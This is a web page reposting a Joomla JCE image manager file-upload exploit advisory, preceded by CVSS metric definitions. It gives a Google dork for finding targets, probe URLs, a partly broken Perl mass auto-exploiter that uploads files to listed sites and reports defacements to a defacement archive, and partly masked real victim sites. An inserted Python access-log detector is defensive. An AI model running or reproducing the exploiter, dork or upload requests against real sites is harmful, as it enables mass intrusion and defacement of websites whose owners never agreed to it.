The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity (AC): Low
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required (PR): None
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
Scope (S): Unchanged
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality (C): High
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity (I): High
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability (A): High
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Below is a copy: Joomla Content Editor JCE ImageManager Vulnerability Mass Auto Exploiter
#################################################################################
Exploit Title : Joomla Content Editor JCE Image Manager Auto Mass Exploiter and Arbitrary File Upload Vulnerability
Author [ Discovered By ] : KingSkrupellos from Cyberizm.Org Digital Security Technological Turkish Moslem Army
Vendor Homepage : joomlacontenteditor.net
Software Download Link : joomlacontenteditor.net/downloads / extensions.joomla.org/extension/jce/
Date : 23/05/2018
Exploit Risk : High
#################################################################################
Google Dork [ Example ] => inurl:''/index.php?option=com_jce''
You can search all plugins and themes to find more sites. Most of them have this plugin JCE installed. [ % 40 or more ] Use your brain.
Explanation for Joomla Content Editor JCE => [ ScreenShot ] https://cdn.pbrd.co/images/Hmx6KZC.jpg
JCE makes creating and editing Joomla! content easy...
Add a set of tools to your Joomla! environment that gives you the power to create the kind of content you want, without limitations, and without needing to know or learn HTML, XHTML, CSS...
Office-like functions and familiar buttons make formatting simple
Upload, rename, delete, cut/copy/paste images and insert them into your articles using an intuitive and familiar interface
Create Links to Categories, Articles, Weblinks and Contacts in your site using a unique and practical Link Browser
Easily tab between WYSIWYG, Code and Preview modes.
Create Tables, edit Styles, format text and more...
Integrated Spellchecking using your browser's Spellchecker
Fine-grained control over the editor layout and features with Editor Profiles
Media Manager => Upload and insert a range of common media files including Adobe Flash, Apple Quicktime, Windows Media Player and HTML 5 Video and Audio.
Easily insert Youtube and Vimeo videos - just paste in the URL and Insert!
Insert HTML5 Video and Audio with multiple source options
Image Manager Extended => Create a thumbnail of any part of an image with the Thumbnail Editor
Insert multiple images. Create responsive images with the srcset attribute
Create image popups in a few clicks - requires JCE MediaBox or compatible Popup Extension
Filemanager => Create links to images, documents, media and other common file types
Include a file type icon, file size and modified date
Insert as a link or embed the document with an iframe
Create downloadable files using the download attribute.
Template Manager => Insert pre-defined template content form html or text files
Create template snippet files from whole articles or selected content
Configure the Template Manager to set the startup content of new articles
#################################################################################
Severity: High [ ScreenShot for JCE Editor ] => https://cdn.pbrd.co/images/HmypA0v.png
This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening.
The component is prone to the following security vulnerabilities:
1. A cross-site scripting vulnerability, because it fails to sufficiently sanitize user-supplied input to the 'search' parameter of the 'administrator/index.php' script.
2. A security-bypass vulnerability that occurs due to an error in the 'components/com_jce/editor/extensions/browser/file.php' script.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
JCE 2.1.0 is vulnerable; other versions may also be affected.
References => https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=27481
References => https://www.securityfocus.com/bid/53630
Note : This is not the previous Joomla JCE exploit that goes to this path => ..../images/stories/......php
This JCE issue is well known to some hackers, but others know nothing about this vulnerability. So this is the new one.
TARGETSTE/yourfilename.png .gif .jpg or TARGETSTE/images/yourfilename.html .php .asp .jpg .gif .png
#################################################################################
Notes =>
Joomla Content Editor JCE Toggle Editor / Image Manager behind the Administration Panel [ ScreenShot ] => https://cdn.pbrd.co/images/Hmx6KZC.jpg
An attacker cannot reach this image manager without a username and password for the control panel. But there is a little trick to upload an image or a file through this vulnerability.
The attacker has to use remote file upload code.
Watch Videos from Original Sources =>
Install JCE Editor in Joomla! 2.5 Tutorial => https://www.youtube.com/watch?v=oQdyi_xKJBk
Joomla 3 Tutorial #7: Using the Joomla Content Editor (JCE) Tutorial => https://www.youtube.com/watch?v=fI0_S-T1gK8
How to Update Upgrade a Joomla! Page that uses JCE: the Joomla Content Editor. Fix the Bugs for this Vulnerability => https://www.youtube.com/watch?v=X6h5kcAxvu0
#################################################################################
When testing security, you can check whether a site is vulnerable by opening these exploit URLs in your browser. You will see errors like the following.
Exploit => ....../index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20
{"result":{"error":true,"result":""},"error":null}
Exploit => ...../index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
or giving this error => {"result":null,"error":"No function call specified!"}
Exploit => /component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/
{"result":null,"error":"No function call specified!"}
Path => TARGETSTE/yourfilename.png gif jpg or TARGETSTE/images/yourfilename.png gif jpg html txt
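Seen from the defender's side, the request forms quoted above share one parameter set, so they can be found in web server access logs. The following is an added example, not code from the original post: it assumes Combined Log Format, the function names are this example's own, and the log lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined Log Format: ip - - [time] "METHOD target PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')
# Parameter values shared by every imgmanager request quoted on this page.
SIGNATURE = {"option": "com_jce", "task": "plugin", "plugin": "imgmanager",
             "file": "imgmanager", "method": "form"}
SCRIPT_UA = "Netscape/7.1 (ax)"  # tail of the User-Agent hard-coded in the page's script

def request_params(target):
    """Collect parameters from the query string and the SEF 'key,value/' path form."""
    parts = urlsplit(target)
    params = {k.lower(): v[-1].lower() for k, v in parse_qs(parts.query).items()}
    for segment in unquote(parts.path).split("/"):
        key, sep, value = segment.partition(",")
        if sep:
            params.setdefault(key.lower(), value.lower())
    return params

def classify(line):
    """Return a finding dict for a JCE imgmanager request, or None for other lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, target, status, agent = m.groups()
    params = request_params(target)
    if any(params.get(k) != v for k, v in SIGNATURE.items()):
        return None
    return {"ip": ip, "status": int(status),
            "kind": "upload-attempt" if method == "POST" else "probe",
            "script_ua": agent.endswith(SCRIPT_UA)}

def scan(lines):
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (documentation IP ranges, not real traffic).
_Q = "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form"
_UA = "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4) Gecko/20030624 " + SCRIPT_UA
SAMPLE_LOG = [
    f'198.51.100.7 - - [23/May/2018:10:00:01 +0000] "GET {_Q}&cid=20 HTTP/1.1" 200 52 "-" "{_UA}"',
    f'198.51.100.7 - - [23/May/2018:10:00:02 +0000] "POST {_Q}&cid=20 HTTP/1.1" 200 48 "-" "{_UA}"',
    '203.0.113.9 - - [23/May/2018:10:05:00 +0000] "GET /component/option,com_jce/action,upload'
    '/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/ HTTP/1.1" 200 53 "-" "curl/7.58.0"',
    '192.0.2.44 - - [23/May/2018:10:06:00 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```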
Auto Mass Exploiter Perl =>
[code]#!/usr/bin/perl
use Term::ANSIColor;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Request::Common qw(POST);
$ua = LWP::UserAgent->new(keep_alive => 1);
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)");
$ua->timeout (10);
system('title JCE Mass Auto Exploiter by KingSkrupellos');
print "JCE Mass Auto Exploiter\n";
print "Coded by KingSkrupellos\n";
print "Cyberizm Digital Security Team\n";
print "Sitelerin Listesi Reyis:";
my $list=<STDIN>;
chomp($list);
open (THETARGET, "<$list") || die ">>>Web sitesi listesi alamyor<<< !";
@TARGETS = <THETARGET>;
close THETARGET;
$link=$#TARGETS + 1;
foreach $site(@TARGETS){
chomp $site;
if($site !~ /http:\/\//) { $site = "http://$site/"; };
$exploiturl="/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20";
print "wait upload $site\n";
$vulnurl=$site.$exploiturl;
$res = $ua->get($vulnurl)->content;
if ($res =~ m/No function call specified!/i){
open(save, '>>C:\Users\Kullanclar\Mustafa\result\list.txt');
print "\n[Uploading]";
my $res = $ua->post($vulnurl,
Content_Type => 'form-data',
Content => [
'upload-dir' => './../../',
'upload-overwrite' => 0,
'Filedata' => ["kingskrupellos.png"],
'action' => 'upload'
]
)->decoded_content;
if ($res =~ m/"error":false/i){
}else{
print " ......... ";
print color('bold white');
print "[";
print color('reset');
print color('bold green');
print "PATCHED";
print color('reset');
print color('bold white');
print "] \n";
print color('reset');
}
$remote = IO::Socket::INET->new(
Proto=>
PeerAddr=>"$site",
PeerPort=>
Timeout=>
);
$def= "$site/kingskrupellos.png";
print colored ("[+]Basarili",'white on_red'),"\n";
print "$site/kingskrupellos.png\n";
}else{
print colored (">>Exploit Olmadi<<",'white on_blue'),"\n";
}
}
sub zonpost{
$req = HTTP::Request->new(GET=>$link);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($req);
$ar = $response->content;
if ($ar =~ /Hacked By KingSkrupellos/){
$dmn= $link;
$def="KingSkrupellos";
$zn="http://aljyyosh.org/single.php";
$lwp=LWP::UserAgent->new;
$res=$lwp -> post($zn,[
'defacer' => $def,
'domain1' => $dmn,
'hackmode' => '15',
'reason' => '1',
'Gnder' => 'Send',
]);
if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
print colored ("[-]Gnder $1",'white on_green'),"\n";
}
else
{
print colored ("[-]Hata",'black on_white'),"\n";
}
}else{
print" Zone Alnmad !! \n";
}
}[/code]
How to use this code on your operating system like Windows ;
Open Start + Go to Search Button + Type + Command Prompt [ Komut İstemi ] => or cmd.exe
Or you can use ConEmulator for Windows => https://conemu.github.io => Download it and use it.
Create a folder like " jcee " and put your jceexploit.pl and yourimagefile.png ,gif ,png ,html ,txt
C:/Users/Your-Computer-Name/ cd Desktop
cd "jcee"
perl yourexploitcodenamejce.pl
site.txt
Waiting for Upload
Exploit Successful or Not
Finished
#################################################################################
Example Sites =>
aXbcdance.ro/component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/
{"result":{"error":true,"result":""},"error":null}
sXv-pfaffenhofen.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
{"result":{"error":true,"result":""},"error":null}
bXuses.co.il/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
THE END
#################################################################################
Discovered By KingSkrupellos from Cyberizm Digital Security Team